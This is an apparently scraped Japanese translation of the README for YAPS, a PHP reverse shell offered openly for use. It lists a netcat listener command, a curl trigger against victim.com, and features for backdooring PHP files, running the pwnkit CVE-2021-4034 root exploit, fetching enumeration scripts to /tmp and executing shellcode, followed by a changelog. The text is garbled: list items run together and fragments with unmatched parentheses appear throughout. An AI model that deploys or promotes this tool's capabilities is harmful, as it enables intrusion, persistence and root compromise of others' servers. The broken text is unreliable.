
Yet Another PHP Shell - 最も完全なPHPリバースシェル

はい、名前が示す通り、これはまた別のPHPリバースシェルで、世の中に数百あるものの一つですが、いくつかの利点があります。すべての機能を含む単一のPHPファイルであり、シンプルなTCPリスナー(例:nc -lp 1337)で制御できます。
現在のバージョン(1.5)では、主要機能はLinuxシステムのみをサポートしていますが、今後Windowsでも動作するように計画しています。
現在は最初のバージョンであり、まだ十分にテストされていません。次バージョンでは行いたいことや改善点がまだたくさんあります(まだ完成していません!)。バグを見つけたり、機能や改善の提案があればお知らせください。=)
!interactive でインタラクティブシェルを起動できます)
rlwrap nc -lp <ip> <port> を使用する場合を除く)curl -x POST -d "x=ip:port" victim.com/yaps.php)。yaps.php?s または yaps.php?silent を設定するとバナーを非表示にできます。php yaps.php ip port のように実行できます。!help - ヘルプメニューを表示!all-colors - すべての色を切り替え(色なしTTYに対応)!color - PS1の色を切り替え(ローカルのみ、環境変数は変更されません)!duplicate - 別のYAPS接続を生成!enum - LinPEASとLinEnumを/tmpにダウンロードして使用可能にする!info - ターゲットの情報(前述の列挙)を一覧表示!infect - 書き込み可能なPHPファイルにバックドアを注入!interactive - 他のポートにインタラクティブリバースシェルを起動(sudo、su、mysqlなどで動作)!passwd - パスワードオプション(有効化、無効化、設定、変更)!php - リモートホストでPHPを記述して実行!pwnkit - CVE-2021-4034のエクスプロイトを試み、ルートリバースシェルを起動!shellcode - リモートホストにシェルコードを送信して実行





v1.5 - 2022/02/12
!shellcodeを追加して任意のシェルコードを受信・実行duplicate()関数を改善(ポート範囲を指定可能に)stabilizeからinteractiveに変更v1.4 - 2022/02/04
!pwnkitを追加してCVE-2021-4034を悪用しルートリバースシェルを起動verify_update()関数を改善v1.3.1 - 2021/08/01
v1.3 - 2021/07/28
!infectを追加してPHPファイルにバックドアを注入!stabilizeのペイロードを変更(バグ修正)v1.2.2 - 2021/07/18
v1.2.1 - 2021/07/17
v1.2 - 2021/07/17
!duplicateを追加して別のシェルを起動--update|-u)--help|-h)php yaps.php ip port)v1.1 - 2021/07/12
!all-colorsを追加してターミナルの色を切り替え、色なしTTYに対応exitコマンドを追加してソケットを閉じる(シェルを終了)!stabilizeのペイロードを変更してHISTSIZEとHISTFILEを設定解除!infoでCPUとmeminfoを取得する方法を変更v1.0.1 - 2021/07/08
[x,y,z]をarray(x,y,z)に変更し、古いPHPバージョンとの互換性を向上いくつかのアイデアは以下のツールからインスピレーションを得ています:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!suggester - Linux Exploit Suggesterを/tmpにダウンロードして使用可能にする

